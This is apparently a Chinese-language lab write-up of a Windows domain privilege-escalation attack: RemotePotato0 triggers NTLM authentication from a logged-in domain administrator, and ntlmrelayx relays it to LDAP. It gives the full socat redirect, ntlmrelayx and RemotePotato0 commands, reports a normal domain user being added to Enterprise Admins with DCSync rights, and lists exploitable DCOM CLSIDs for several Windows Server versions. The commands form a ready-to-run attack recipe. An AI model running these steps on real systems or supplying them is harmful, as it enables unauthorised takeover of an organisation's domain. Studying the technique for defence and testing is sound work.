RemotePotato0+ntlm relay to ldap

原理

滥用 DCOM 激活服务，并触发目标计算机中当前登录的任何用户的 NTLM 身份验证

利用场景：

• 已经获取某个机器的权限，当前用户为普通域用户，但是该机器有高权限用户登录在本机

• 触发高权限用户的NTLM身份验证，并中继到ldap（权限提升，设置基于资源的约束委派...）

环境

kali：10.10.10.10
dc：10.10.10.139
受害机Windows server 2019：10.10.10.111

net user "test1" /domain发现当前用户只是普通域用户

query session发现有administrator(这里是域管)用户登录

利用-权限提升

• 端口重定向，ntlmrelayx监听

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.10.111:9999 &
sudo ntlmrelayx.py -t ldap://10.10.10.139 --no-wcf-server --escalate-user test1

• 使用RemotePotato0触发第二个会话的域管用户进行NTLM身份验证

.\RemotePotato0.exe -m 0 -r 10.10.10.10 -x 10.10.10.10 -p 9999 -s 2

成功后再次net user "test1" /domain查看test1用户所在组

发现已经成为了Enterprise Admins(企业系统管理员)，该组的用户有dcsync的权限

CLSID List

各种Windows版本上可用的CLSID列表：

Windows Server 2019

{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class   
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients  
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog   
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host   
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory  
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser

Windows Server 2016

{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Windows Server 2008 R2

{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

完整CLSID的列表 --> http://ohpe.it/juicy-potato/CLSID/

参考&工具

antonioCoco/RemotePotato0：Windows 权限从用户升级到域管理员。 (github.com)